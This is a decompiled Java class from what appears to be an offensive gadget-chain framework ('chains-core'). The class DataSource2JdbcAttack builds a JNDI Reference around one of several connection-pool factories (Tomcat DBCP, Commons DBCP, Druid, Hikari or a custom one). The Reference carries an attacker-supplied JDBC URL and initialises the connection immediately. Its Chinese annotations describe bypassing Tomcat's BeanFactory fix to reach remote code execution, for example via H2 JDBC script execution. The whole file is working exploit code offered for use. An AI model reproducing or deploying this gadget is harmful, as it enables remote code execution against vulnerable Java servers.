package com.ar3h.chains.gadget.impl.jndi.factory.datasourcefactory;

import com.alibaba.druid.pool.DruidDataSourceFactory;
import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.exception.ThrowsUtil;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.teradata.tdgss.jtdgss.tdgssdefines;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import org.apache.naming.factory.Constants;
import org.hibernate.engine.jdbc.connections.internal.ConnectionProviderInitiator;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

@GadgetAnnotation(name = "通过 DataSource 类加载jdbc，转为jdbc url的利用", description = "绕过Tomcat高版本中BeanFactory修复方案，实现jdbc的利用。例如通过其他DataSourceFactory加载h2 jdbc并执行js表达式进行rce，常用搭配：JdbcUrlRef/h2Jdbc/JegGadget/type=class", dependencies = {Tag.DataSourceFactory})
@GadgetTags(tags = {Tag.Reference}, nextTags = {Tag.JdbcUrlChains})
@Deprecated
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/jndi/factory/datasourcefactory/DataSource2JdbcAttack.class */
public class DataSource2JdbcAttack implements Gadget {
    private static final Logger log = LoggerFactory.getLogger((Class<?>) DataSource2JdbcAttack.class);

    @Param(name = Tag.DataSourceFactory, description = "可以通过配合FindClass探测，选择目标存在的 Factory 类：\n1. tomcat_dbcp1: org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory\n2. tomcat_dbcp2: org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory\n3. commons_dbcp1: org.apache.commons.dbcp.BasicDataSourceFactory\n4. commons_dbcp2: org.apache.commons.dbcp2.BasicDataSourceFactory\n5. tomcat_jdbc: org.apache.tomcat.jdbc.pool.DataSourceFactory\n6. ali_druid: com.alibaba.druid.pool.DruidDataSourceFactory\n7. hikari: com.zaxxer.hikari.HikariJNDIFactory\n8. custom: 使用自定义Factory类名", type = ParamType.Choice, choices = {@Choice(label = "org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory", value = "tomcat_dbcp1"), @Choice(label = Constants.DBCP_DATASOURCE_FACTORY, value = "tomcat_dbcp2"), @Choice(label = "org.apache.commons.dbcp.BasicDataSourceFactory", value = "commons_dbcp1"), @Choice(label = "org.apache.commons.dbcp2.BasicDataSourceFactory", value = "commons_dbcp2"), @Choice(label = "org.apache.tomcat.jdbc.pool.DataSourceFactory", value = "tomcat_jdbc"), @Choice(label = "com.alibaba.druid.pool.DruidDataSourceFactory", value = "ali_druid"), @Choice(label = "com.zaxxer.hikari.HikariJNDIFactory", value = ConnectionProviderInitiator.HIKARI_STRATEGY), @Choice(label = "使用自定义Factory类名", value = tdgssdefines.INTERFACETYPE_CUSTOM)})
    public String factory = "tomcat_dbcp2";

    @Param(name = "自定义Factory类名", requires = false)
    public String customFactory;
    private String driverClassName;

    public Reference getObject(String str) throws Exception {
        Reference reference = new Reference("javax.sql.DataSource", getFactory(), (String) null);
        reference.add(new StringRefAddr(DruidDataSourceFactory.PROP_DRIVERCLASSNAME, this.driverClassName));
        reference.add(new StringRefAddr("url", str));
        reference.add(new StringRefAddr("jdbcUrl", str));
        reference.add(new StringRefAddr("username", "root"));
        reference.add(new StringRefAddr("password", "password"));
        reference.add(new StringRefAddr(DruidDataSourceFactory.PROP_INITIALSIZE, "1"));
        reference.add(new StringRefAddr("init", "true"));
        return reference;
    }

    public String getFactory() {
        String str = null;
        if ("tomcat_dbcp2".equalsIgnoreCase(this.factory)) {
            str = Constants.DBCP_DATASOURCE_FACTORY;
        } else if ("tomcat_dbcp1".equalsIgnoreCase(this.factory)) {
            str = "org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory";
        } else if ("commons_dbcp2".equalsIgnoreCase(this.factory)) {
            str = "org.apache.commons.dbcp2.BasicDataSourceFactory";
        } else if ("commons_dbcp1".equalsIgnoreCase(this.factory)) {
            str = "org.apache.commons.dbcp.BasicDataSourceFactory";
        } else if ("tomcat_jdbc".equalsIgnoreCase(this.factory)) {
            str = "org.apache.tomcat.jdbc.pool.DataSourceFactory";
        } else if ("ali_druid".equalsIgnoreCase(this.factory)) {
            str = "com.alibaba.druid.pool.DruidDataSourceFactory";
        } else if (ConnectionProviderInitiator.HIKARI_STRATEGY.equalsIgnoreCase(this.factory)) {
            str = "com.zaxxer.hikari.HikariJNDIFactory";
        } else if (tdgssdefines.INTERFACETYPE_CUSTOM.equalsIgnoreCase(this.factory)) {
            str = this.customFactory;
        } else {
            ThrowsUtil.throwNotFoundOptionGadgetException(this.factory);
        }
        log.info("select factory : {}", str);
        return str;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        String str = (String) gadgetChain.doCreate(gadgetContext);
        this.driverClassName = gadgetContext.getString(ContextTag.DRIVER_CLASS_NAME_KEY);
        return getObject(str);
    }
}
